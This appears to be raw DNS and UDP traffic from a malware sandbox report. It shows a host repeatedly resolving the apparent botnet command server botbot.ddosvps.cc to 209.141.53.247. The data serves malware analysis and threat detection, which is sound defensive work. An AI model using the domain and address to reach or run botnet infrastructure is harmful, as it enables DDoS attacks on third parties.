Jul 2, 2024 18:18:32.409267902 CEST	36134	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:32.410566092 CEST	46966	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:32.416179895 CEST	53	36134	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:32.417448044 CEST	53	46966	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:34.019505978 CEST	46858	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:34.021035910 CEST	35526	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:34.026371002 CEST	53	46858	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:34.027178049 CEST	53	35526	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:35.626566887 CEST	39583	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:35.627047062 CEST	43695	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:35.633764982 CEST	53	39583	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:35.634094954 CEST	53	43695	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:37.261048079 CEST	41229	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:37.261574984 CEST	42923	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:37.271095037 CEST	53	42923	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:37.271111012 CEST	53	41229	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:38.896224976 CEST	35403	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:38.899614096 CEST	46872	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:38.904547930 CEST	53	35403	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:38.906589985 CEST	53	46872	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:40.566926003 CEST	49742	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:40.567166090 CEST	41172	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:40.573052883 CEST	53	49742	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:40.573316097 CEST	53	41172	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:42.190326929 CEST	52198	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:42.191659927 CEST	51214	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:42.197849035 CEST	53	52198	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:42.198654890 CEST	53	51214	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:43.800645113 CEST	38991	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:43.804465055 CEST	35288	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:43.807982922 CEST	53	38991	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:43.813837051 CEST	53	35288	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:45.487343073 CEST	55423	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:45.488285065 CEST	45796	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:45.494303942 CEST	53	55423	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:45.494832993 CEST	53	45796	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:47.116287947 CEST	50934	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:47.120153904 CEST	43117	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:47.125104904 CEST	53	50934	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:47.126455069 CEST	53	43117	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:48.740565062 CEST	42874	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:48.741900921 CEST	43405	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:48.748600960 CEST	53	42874	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:48.750658989 CEST	53	43405	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:50.366559029 CEST	53514	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:50.368706942 CEST	49314	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:50.373543978 CEST	53	53514	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:50.376060963 CEST	53	49314	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:52.055901051 CEST	39868	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:52.059175968 CEST	39045	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:52.062364101 CEST	53	39868	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:52.065781116 CEST	53	39045	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:53.693631887 CEST	37045	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:53.695858002 CEST	46453	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:53.700107098 CEST	53	37045	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:53.703392029 CEST	53	46453	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:55.317455053 CEST	46680	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:55.320723057 CEST	45685	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:55.323887110 CEST	53	46680	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:55.327637911 CEST	53	45685	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:57.639883041 CEST	50669	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:57.641623020 CEST	37409	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:57.647264957 CEST	53	50669	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:57.648896933 CEST	53	37409	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:59.418267965 CEST	55914	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:59.419930935 CEST	36411	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:59.425518990 CEST	53	55914	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:59.427670002 CEST	53	36411	8.8.8.8	192.168.2.14

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 2, 2024 18:17:07.956012011 CEST	192.168.2.14	8.8.8.8	0xdbb0	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:07.956263065 CEST	192.168.2.14	8.8.8.8	0xad73	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:09.585767984 CEST	192.168.2.14	8.8.8.8	0x986f	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:09.588418961 CEST	192.168.2.14	8.8.8.8	0xc8f3	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:11.218245029 CEST	192.168.2.14	8.8.8.8	0x9562	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:11.219312906 CEST	192.168.2.14	8.8.8.8	0xe4d6	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:12.829366922 CEST	192.168.2.14	8.8.8.8	0x99c8	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:12.829869032 CEST	192.168.2.14	8.8.8.8	0x906d	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:14.439799070 CEST	192.168.2.14	8.8.8.8	0xfadd	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:14.441613913 CEST	192.168.2.14	8.8.8.8	0x33c5	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:16.047192097 CEST	192.168.2.14	8.8.8.8	0xd5f9	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:16.047370911 CEST	192.168.2.14	8.8.8.8	0xf5fd	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:17.676851988 CEST	192.168.2.14	8.8.8.8	0x4271	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:17.677113056 CEST	192.168.2.14	8.8.8.8	0xa54f	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:19.323144913 CEST	192.168.2.14	8.8.8.8	0x8f29	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:19.325397968 CEST	192.168.2.14	8.8.8.8	0xf3da	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:20.985007048 CEST	192.168.2.14	8.8.8.8	0x5918	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:20.985742092 CEST	192.168.2.14	8.8.8.8	0xae4b	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:22.617614985 CEST	192.168.2.14	8.8.8.8	0x33d3	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:22.620430946 CEST	192.168.2.14	8.8.8.8	0x4f57	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:24.239777088 CEST	192.168.2.14	8.8.8.8	0x959c	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:24.241271973 CEST	192.168.2.14	8.8.8.8	0xb32b	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:25.862020016 CEST	192.168.2.14	8.8.8.8	0x729b	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:25.865768909 CEST	192.168.2.14	8.8.8.8	0xe556	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:27.493895054 CEST	192.168.2.14	8.8.8.8	0x5ee9	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:27.494240999 CEST	192.168.2.14	8.8.8.8	0x46eb	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:29.113056898 CEST	192.168.2.14	8.8.8.8	0xb9a	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:29.113287926 CEST	192.168.2.14	8.8.8.8	0x9c90	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:30.720788956 CEST	192.168.2.14	8.8.8.8	0x8ef9	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:30.721255064 CEST	192.168.2.14	8.8.8.8	0x1ae	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:32.384448051 CEST	192.168.2.14	8.8.8.8	0x6c34	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:32.388045073 CEST	192.168.2.14	8.8.8.8	0xb152	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:34.102909088 CEST	192.168.2.14	8.8.8.8	0x47fb	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:34.105892897 CEST	192.168.2.14	8.8.8.8	0x9f87	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:35.804716110 CEST	192.168.2.14	8.8.8.8	0xfc4e	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:35.805700064 CEST	192.168.2.14	8.8.8.8	0x60e3	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:37.428777933 CEST	192.168.2.14	8.8.8.8	0x815a	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:37.429017067 CEST	192.168.2.14	8.8.8.8	0xbc38	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:39.057856083 CEST	192.168.2.14	8.8.8.8	0xf856	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:39.058794975 CEST	192.168.2.14	8.8.8.8	0xdde9	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:40.672882080 CEST	192.168.2.14	8.8.8.8	0x2e1d	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:40.676434040 CEST	192.168.2.14	8.8.8.8	0x9fde	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:42.281896114 CEST	192.168.2.14	8.8.8.8	0x3a77	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:42.286051989 CEST	192.168.2.14	8.8.8.8	0x45b9	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:44.343955040 CEST	192.168.2.14	8.8.8.8	0x93	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:44.346936941 CEST	192.168.2.14	8.8.8.8	0x322d	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:46.235863924 CEST	192.168.2.14	8.8.8.8	0xc5c1	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:46.236004114 CEST	192.168.2.14	8.8.8.8	0xde6e	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:47.865009069 CEST	192.168.2.14	8.8.8.8	0x1b1	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:47.865421057 CEST	192.168.2.14	8.8.8.8	0xcf51	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:49.540544987 CEST	192.168.2.14	8.8.8.8	0x77e9	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:49.542979002 CEST	192.168.2.14	8.8.8.8	0xa608	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:51.158947945 CEST	192.168.2.14	8.8.8.8	0x55e4	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:51.159199953 CEST	192.168.2.14	8.8.8.8	0x309c	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:52.766591072 CEST	192.168.2.14	8.8.8.8	0x336b	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:52.766813040 CEST	192.168.2.14	8.8.8.8	0x918c	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:54.407182932 CEST	192.168.2.14	8.8.8.8	0xa474	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:54.408224106 CEST	192.168.2.14	8.8.8.8	0x5244	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:56.017827988 CEST	192.168.2.14	8.8.8.8	0x7a03	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:56.020405054 CEST	192.168.2.14	8.8.8.8	0x5129	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:57.648982048 CEST	192.168.2.14	8.8.8.8	0x8de0	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:57.650273085 CEST	192.168.2.14	8.8.8.8	0x5d2e	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:59.298872948 CEST	192.168.2.14	8.8.8.8	0xa4d4	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:17:59.300964117 CEST	192.168.2.14	8.8.8.8	0xe9c9	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:00.926785946 CEST	192.168.2.14	8.8.8.8	0xe213	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:00.929575920 CEST	192.168.2.14	8.8.8.8	0x982b	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:02.583112955 CEST	192.168.2.14	8.8.8.8	0xb0f0	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:02.583539009 CEST	192.168.2.14	8.8.8.8	0xfffb	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:04.205203056 CEST	192.168.2.14	8.8.8.8	0x18ce	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:04.207600117 CEST	192.168.2.14	8.8.8.8	0x1188	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:05.833380938 CEST	192.168.2.14	8.8.8.8	0x3b06	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:05.833585024 CEST	192.168.2.14	8.8.8.8	0xe426	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:07.458477974 CEST	192.168.2.14	8.8.8.8	0x954f	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:07.458709002 CEST	192.168.2.14	8.8.8.8	0xd0f5	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:09.079108000 CEST	192.168.2.14	8.8.8.8	0x1115	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:09.081171036 CEST	192.168.2.14	8.8.8.8	0x21b1	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:10.706191063 CEST	192.168.2.14	8.8.8.8	0x7d2b	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:10.706813097 CEST	192.168.2.14	8.8.8.8	0xcc84	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:12.564538002 CEST	192.168.2.14	8.8.8.8	0x2ef5	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:12.566168070 CEST	192.168.2.14	8.8.8.8	0xb24c	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:14.189620018 CEST	192.168.2.14	8.8.8.8	0xdeaa	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:14.191409111 CEST	192.168.2.14	8.8.8.8	0xa13	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:15.793837070 CEST	192.168.2.14	8.8.8.8	0x1dfe	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:15.798129082 CEST	192.168.2.14	8.8.8.8	0x7e0e	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:17.431051970 CEST	192.168.2.14	8.8.8.8	0xb533	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:17.432936907 CEST	192.168.2.14	8.8.8.8	0x27a3	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:19.110043049 CEST	192.168.2.14	8.8.8.8	0x8bcf	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:19.111685038 CEST	192.168.2.14	8.8.8.8	0x46bd	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:20.736413002 CEST	192.168.2.14	8.8.8.8	0x5b94	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:20.739415884 CEST	192.168.2.14	8.8.8.8	0xb00	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:22.348264933 CEST	192.168.2.14	8.8.8.8	0xe18a	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:22.350099087 CEST	192.168.2.14	8.8.8.8	0xa5a7	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:23.971515894 CEST	192.168.2.14	8.8.8.8	0xdb7e	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:23.973639011 CEST	192.168.2.14	8.8.8.8	0xe66c	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:25.581408978 CEST	192.168.2.14	8.8.8.8	0xcd0d	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:25.581614971 CEST	192.168.2.14	8.8.8.8	0x5ca8	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:27.500885010 CEST	192.168.2.14	8.8.8.8	0xf41f	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:27.501178980 CEST	192.168.2.14	8.8.8.8	0x99f5	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:29.130549908 CEST	192.168.2.14	8.8.8.8	0xa3ba	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:29.131526947 CEST	192.168.2.14	8.8.8.8	0xaf5c	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:30.772569895 CEST	192.168.2.14	8.8.8.8	0xf256	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:30.773159027 CEST	192.168.2.14	8.8.8.8	0xae10	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:32.409267902 CEST	192.168.2.14	8.8.8.8	0x647e	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:32.410566092 CEST	192.168.2.14	8.8.8.8	0xf658	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:34.019505978 CEST	192.168.2.14	8.8.8.8	0x100d	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:34.021035910 CEST	192.168.2.14	8.8.8.8	0xde2d	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:35.626566887 CEST	192.168.2.14	8.8.8.8	0x8f30	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:35.627047062 CEST	192.168.2.14	8.8.8.8	0x9a7d	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:37.261048079 CEST	192.168.2.14	8.8.8.8	0xf4d6	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:37.261574984 CEST	192.168.2.14	8.8.8.8	0xcc82	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:38.896224976 CEST	192.168.2.14	8.8.8.8	0x87bf	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:38.899614096 CEST	192.168.2.14	8.8.8.8	0xf9a9	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:40.566926003 CEST	192.168.2.14	8.8.8.8	0x2ed5	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:40.567166090 CEST	192.168.2.14	8.8.8.8	0x4071	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:42.190326929 CEST	192.168.2.14	8.8.8.8	0x754a	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:42.191659927 CEST	192.168.2.14	8.8.8.8	0xbe57	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:43.800645113 CEST	192.168.2.14	8.8.8.8	0x4ea1	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:43.804465055 CEST	192.168.2.14	8.8.8.8	0xea2a	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:45.487343073 CEST	192.168.2.14	8.8.8.8	0x70fc	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:45.488285065 CEST	192.168.2.14	8.8.8.8	0x5ba4	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:47.116287947 CEST	192.168.2.14	8.8.8.8	0x7a44	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:47.120153904 CEST	192.168.2.14	8.8.8.8	0x7769	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:48.740565062 CEST	192.168.2.14	8.8.8.8	0xd83b	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:48.741900921 CEST	192.168.2.14	8.8.8.8	0x72cf	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:50.366559029 CEST	192.168.2.14	8.8.8.8	0xe5c3	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:50.368706942 CEST	192.168.2.14	8.8.8.8	0xf889	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:52.055901051 CEST	192.168.2.14	8.8.8.8	0x4e53	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:52.059175968 CEST	192.168.2.14	8.8.8.8	0xa678	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:53.693631887 CEST	192.168.2.14	8.8.8.8	0x26c7	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:53.695858002 CEST	192.168.2.14	8.8.8.8	0x28aa	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:55.317455053 CEST	192.168.2.14	8.8.8.8	0x1454	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:55.320723057 CEST	192.168.2.14	8.8.8.8	0x8d5d	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:57.639883041 CEST	192.168.2.14	8.8.8.8	0x69d4	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:57.641623020 CEST	192.168.2.14	8.8.8.8	0xeb8a	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:18:59.418267965 CEST	192.168.2.14	8.8.8.8	0xc9b	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:18:59.419930935 CEST	192.168.2.14	8.8.8.8	0x6df8	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jul 2, 2024 18:17:07.970762968 CEST	8.8.8.8	192.168.2.14	0xdbb0	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:09.598722935 CEST	8.8.8.8	192.168.2.14	0x986f	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:11.225199938 CEST	8.8.8.8	192.168.2.14	0x9562	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:12.836313009 CEST	8.8.8.8	192.168.2.14	0x99c8	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:14.448255062 CEST	8.8.8.8	192.168.2.14	0x33c5	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:17:16.061954975 CEST	8.8.8.8	192.168.2.14	0xd5f9	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
